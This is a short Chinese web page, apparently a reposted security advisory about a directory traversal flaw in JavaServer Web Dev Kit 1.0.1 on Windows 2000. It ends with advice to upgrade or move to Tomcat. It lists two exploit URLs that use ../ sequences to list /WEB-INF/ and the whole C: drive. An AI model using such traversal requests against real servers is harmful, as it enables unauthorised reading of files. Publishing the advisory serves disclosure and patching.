加入收藏 | 设为首页 | 会员中心 | 我要投稿 | RSS
您当前的位置:首页 > 阅读中心 > 软件学习

JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞

时间:2014-05-04 10:34:42  来源:JSP天空网  作者:未知
涉及程序:
JavaServer Web Dev Kit(JSWDK)
描述:
JavaServer Web Dev Kit(JSWDK) for win2000 目录遍历漏洞
详细:
发现装了 JavaServer Web Dev Kit(JSWDK)1.0.1 的 WINDOWS NT/2000 系统存在漏洞,
攻击者通过构造特殊的 URL 请求能访问未授权文件。
exploits:
http://localhost:8080/examples//WEB-INF/
会列出 /WEB-INF/ 目录 .
http://localhost:8080/../examples//WEB-INF/../../../../../
如果 JSWDK 被装在 c: ,此请求将会列出 c: 下所有目录和文件
受影响系统:
JavaServer Web Dev Kit(JSWDK)1.0.1 for win2000
解决方案:
CNNS 建议您升级 JSWDK 版本
建议您升级到tomcat.
来顶一下
返回首页
返回首页
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
推荐资讯
后牧工业区厂房1500平出租
后牧工业区厂房1500平
现实的童话公主艾米·罗森
现实的童话公主艾米·
科比专为大场面而生
科比专为大场面而生
“最美清洁工”原是《赤壁》宫女
“最美清洁工”原是《
相关文章
    无相关信息
栏目更新
栏目热门